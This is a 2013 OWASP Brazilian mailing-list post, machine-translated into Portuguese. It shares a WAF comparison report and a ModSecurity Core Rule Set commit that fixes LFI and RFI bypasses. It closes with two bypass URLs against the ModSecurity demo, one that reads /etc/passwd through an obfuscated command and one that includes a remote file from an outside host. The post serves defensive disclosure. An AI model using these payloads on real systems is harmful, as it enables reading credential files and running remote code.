[Owasp-brazilian] [Owasp-modsecurity-core-rule-set] CloudFlare vs Incapsula vs ModSecurity (CloudFlare vs Incapsula ModSecurity vs)

firebits mrpa.security at gmail.com
Wed Feb 27 22:20:05 UTC 2013


FYI

Da lista
*[Owasp-modsecurity-core-rule-set] CloudFlare vs Incapsula vs ModSecurity
(CloudFlare vs Incapsula ModSecurity vs)
*
By Ryan Barnett:

Um relatório interessante sobre WAF
http://zeroscience.mk/files/wafreport2013.pdf

ModSecurity tem a melhor taxa de falso negativo :)

Eu apenas atualizado github repo com correções para o 2 LFI / RFI ignora -

https://github.com/SpiderLabs/owasp-modsecurity-crs/commit/7ff865deab72b0993824ce4ef53189745a4dd1a3

Note que para a questão LFI eu apliquei o t: função de transformação
cmdLine -

https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-cmdLine

Graças a Marc Stern pela contribuição!

Bypass LFI
http://www.modsecurity.org/demo/phpids?test=cat 20% \ / \ etc / passwd

RFI Bypass
http://www.modsecurity.org/demo/phpids?test=http://dni.destr0y.net/x.txt

Att

@firebitsbr
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-brazilian/attachments/20130227/09f28cb1/attachment.html>


More information about the Owasp-brazilian mailing list